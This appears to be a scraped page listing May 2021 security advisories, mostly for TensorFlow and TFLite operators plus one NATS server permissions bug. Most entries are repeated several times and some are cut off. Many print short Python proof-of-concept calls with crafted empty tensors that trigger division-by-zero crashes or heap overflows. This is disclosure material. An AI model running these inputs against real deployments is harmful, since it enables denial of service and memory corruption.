Advisories

May 2021

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow in `AvgPool3DGrad`

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow: import tensorflow as tf orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32) grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.AvgPool3DGrad( orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding)

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow caused by rounding

An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in off-by-one error in accessing image elements: import tensorflow as tf l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384] images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32) size = tf.constant([12, 6], shape=[2], dtype=tf.int32) min = tf.constant(80.22522735595703) max = tf.constant(80.39215850830078) tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

Heap buffer overflow and undefined behavior in `FusedBatchNorm`

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow: import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=tf.float32) variance = tf.constant([0.0], shape=[1], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training) If the tensors are empty, the …

github.com/nats-io/nats-server/ Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

github.com/nats-io/nats-server/ Import token permissions checking not enforced

(This advisory is canonically https://advisories.nats.io/CVE/CVE-2021-3127.txt) Problem Description The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT …

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `TransposeConv`

The optimized implementation of the TransposeConv TFLite operator is vulnerable to a division by zero error: int height_col = (height + pad_t + pad_b - filter_h) / stride_h + 1; int width_col = (width + pad_l + pad_r - filter_w) / stride_w + 1; An attacker can craft a model such that stride_{h,w} values are 0. Code calling this function must validate these arguments.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToDepth`

The Prepare step of the SpaceToDepth TFLite operator does not check for 0 before division. const int block_size = params->block_size; const int input_height = input->dims->data[1]; const int input_width = input->dims->data[2]; int output_height = input_height / block_size; int output_width = input_width / block_size; An attacker can craft a model such that params->block_size would be zero.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `SpaceToBatchNd`

The implementation of the SpaceToBatchNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, final_dim_size % block_shape[dim], 0); output_size->data[dim + 1] = final_dim_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `OneHot`

The implementation of the OneHot TFLite operator is vulnerable to a division by zero error: int prefix_dim_size = 1; for (int i = 0; i < op_context.axis; ++i) { prefix_dim_size *= op_context.indices->dims->data[i]; } const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; An attacker can craft a model such that at least one of the dimensions of indices would be 0. In turn, the prefix_dim_size value would become 0.

Division by zero in TFLite's implementation of `GatherNd`

The reference implementation of the GatherNd TFLite operator is vulnerable to a division by zero error: ret.dims_to_count[i] = remain_flat_size / params_shape.Dims(i); An attacker can craft a model such that params input would be an empty tensor. In turn, params_shape.Dims(.) would be zero, in at least one dimension.

Division by zero in TFLite's implementation of `DepthToSpace`

The implementation of the DepthToSpace TFLite operator is vulnerable to a division by zero error: const int block_size = params->block_size; … const int input_channels = input->dims->data[3]; … int output_channels = input_channels / block_size / block_size; An attacker can craft a model such that params->block_size is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in TFLite's implementation of `BatchToSpaceNd`

The implementation of the BatchToSpaceNd TFLite operator is vulnerable to a division by zero error: TF_LITE_ENSURE_EQ(context, output_batch_size % block_shape[dim], 0); output_batch_size = output_batch_size / block_shape[dim]; An attacker can craft a model such that one dimension of the block input is 0. Hence, the corresponding value in block_shape is 0.

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in padding computation in TFLite

The TFLite computation for size of output after padding, ComputeOutSize, does not check that the stride argument is not 0 before doing the division. inline int ComputeOutSize(TfLitePadding padding, int image_size, int filter_size, int stride, int dilation_rate = 1) { int effective_filter_size = (filter_size - 1) * dilation_rate + 1; switch (padding) { case kTfLitePaddingSame: return (image_size + stride - 1) / stride; case kTfLitePaddingValid: return (image_size + stride - effective_filter_size) …

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv3D`

A malicious user could trigger a division by 0 in Conv3D implementation: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, filter=filter_tensor, strides=[1, 56, 56, 56, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 23, 1])

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by zero in `Conv2DBackpropFilter`

An attacker can cause a division by zero to occur in Conv2DBackpropFilter: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor, filter_sizes=filter_sizes, out_backprop=out_backprop, strides=[1, 1, 1, 1], use_cudnn_on_gpu=False, padding='SAME', explicit_paddings=[], data_format='NHWC', dilations=[1, 1, 1, 1] )

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `SparseMatMul`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.SparseMatMul: import tensorflow as tf a = tf.constant([100.0, 100.0, 100.0, 100.0], shape=[2, 2], dtype=tf.float32) b = tf.constant([], shape=[0, 2], dtype=tf.float32) tf.raw_ops.SparseMatMul( a=a, b=b, transpose_a=True, transpose_b=True, a_is_sparse=True, b_is_sparse=True) The division by 0 occurs deep in Eigen code because the b tensor is empty.

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `Reverse`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.Reverse: import tensorflow as tf tensor_input = tf.constant([], shape=[0, 1, 1], dtype=tf.int32) dims = tf.constant([False, True, False], shape=[3], dtype=tf.bool) tf.raw_ops.Reverse(tensor=tensor_input, dims=dims)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedMul`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul: import tensorflow as tf x = tf.zeros([4, 1], dtype=tf.quint8) y = tf.constant([], dtype=tf.quint8) min_x = tf.constant(0.0) max_x = tf.constant(0.0010000000474974513) min_y = tf.constant(0.0) max_y = tf.constant(0.0010000000474974513) tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedConv2D`

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedConv2D: import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME"

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBiasAdd`

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd: import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) bias = tf.constant([], shape=[0], dtype=tf.quint8) min_input = tf.constant(-10.0, dtype=tf.float32) max_input = tf.constant(-10.0, dtype=tf.float32) min_bias = tf.constant(-10.0, dtype=tf.float32) max_bias = tf.constant(-10.0, dtype=tf.float32) tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=tf.qint32)

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedBatchNormWithGlobalNormalization`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization: import tensorflow as tf t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8) t_min = tf.constant(-10.0, dtype=tf.float32) t_max = tf.constant(-10.0, dtype=tf.float32) m = tf.constant([], shape=[0], dtype=tf.quint8) m_min = tf.constant(-10.0, dtype=tf.float32) m_max = tf.constant(-10.0, dtype=tf.float32) v = tf.constant([], shape=[0], dtype=tf.quint8) v_min = tf.constant(-10.0, dtype=tf.float32) v_max = tf.constant(-10.0, dtype=tf.float32) beta = tf.constant([], shape=[0], dtype=tf.quint8) beta_min = tf.constant(-10.0, …

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `QuantizedAdd`

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd: import tensorflow as tf x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8) y = tf.constant([], shape=[2, 0], dtype=tf.quint8) min_x = tf.constant(10.723421015884028) max_x = tf.constant(15.19578006631113) min_y = tf.constant(-5.539003866682977) max_y = tf.constant(42.18819949559947) tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `MaxPoolGradWithArgmax`

The implementation of tf.raw_ops.MaxPoolGradWithArgmax is vulnerable to a division by 0: import tensorflow as tf input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) argmax = tf.constant([], shape=[0], dtype=tf.int64) ksize = [1, 1, 1, 1] strides = [1, 1, 1, 1] tf.raw_ops.MaxPoolGradWithArgmax( input=input, grad=grad, argmax=argmax, ksize=ksize, strides=strides, padding='SAME', include_batch_in_index=False)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FusedBatchNorm`

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm: import tensorflow as tf x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32) scale = tf.constant([], shape=[0], dtype=tf.float32) offset = tf.constant([], shape=[0], dtype=tf.float32) mean = tf.constant([], shape=[0], dtype=tf.float32) variance = tf.constant([], shape=[0], dtype=tf.float32) epsilon = 0.0 exponential_avg_factor = 0.0 data_format = "NHWC" is_training = False tf.raw_ops.FusedBatchNorm( x=x, scale=scale, offset=offset, mean=mean, variance=variance, epsilon=epsilon, exponential_avg_factor=exponential_avg_factor, data_format=data_format, is_training=is_training)

Division by 0 in `FusedBatchNorm`

